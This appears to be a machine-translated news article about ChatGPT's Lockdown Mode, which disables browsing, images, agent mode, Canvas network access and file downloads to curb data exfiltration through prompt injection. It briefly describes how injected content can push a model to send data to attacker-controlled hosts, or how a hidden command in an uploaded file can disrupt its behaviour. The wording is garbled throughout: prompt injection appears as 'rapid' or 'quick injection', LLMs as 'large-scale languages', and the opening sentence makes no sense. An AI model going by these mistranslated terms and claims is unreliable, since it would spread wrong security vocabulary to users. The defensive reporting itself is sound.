OpenAI has started releasing a new one Lock mode in ChatGPT to find suitable personal accounts to reduce the risk of data exfiltration from a rapid injection attack.
This feature is designed for individuals and organizations that handle sensitive data and require strong security guarantees. Lockdown Mode is available to users logged in to all Free, Go, Plus, and Pro, as well as ChatGPT Business plans for self-service.
“Lockdown Mode is an optional advanced security setting that restricts many tools and capabilities in OpenAI products that can connect to the web or external services,” OpenAI said.
“It is designed to reduce the risk of data leakage from rapid injection attacks by reducing outgoing network requests, at the expense of disabling or limiting certain useful features.”
The defenses are intended to harden the attack surface against rapid injection, which continues to be a “borderline” problem that affects all types of large-scale languages (LLMs).
In particular, they build on sandboxing and existing controls to combat URL-based data extraction methods to limit outgoing network requests that may transmit sensitive data to attacker-controlled infrastructure.
The idea is not to stop rapid injections from happening. It also doesn’t change how memory or file loading works, or the ability to share chat. Rather, the goal is to eliminate potential ways in which data can be extracted. To do that, Lockdown Mode disables the following features –
- Live web browsing, limited to accessing cached content only
- Image support, displaying images in standard responses or retrieving images from the web
- Advanced Search
- Agent mode
- Canvas Network, which prevents users from allowing Canvas-generated code to access the network
- File downloads, which prevent downloading files for data analysis
Pointing out the feature is “not intended for everyone,” OpenAI also noted that both Lockdown Mode and Developer Mode cannot be used at the same time, adding that turning one on disables the other.
“Lockdown Mode is designed to greatly reduce the risk of rapid injection-based data leakage in ChatGPT and OpenAI supported products, but does not guarantee that data leakage will not occur,” the company said. “Danger may remain with enabled applications, unexpected combinations of skills, or newly discovered techniques.”
“Lockdown mode also does not prevent all other effects of a quick injection attack. For example, a malicious command hidden in an uploaded file can still disrupt the behavior of ChatGPT, and cause an incorrect response.”
The improvement comes as OpenAI also introduces a new account management feature that allows users to review active ChatGPT sessions and log out of individual sessions or all sessions if signs of unauthorized account activity are detected. The sessions listed include information about the device, the application used, approximate location, login date and time, whether the device is trusted, and whether the session is current.
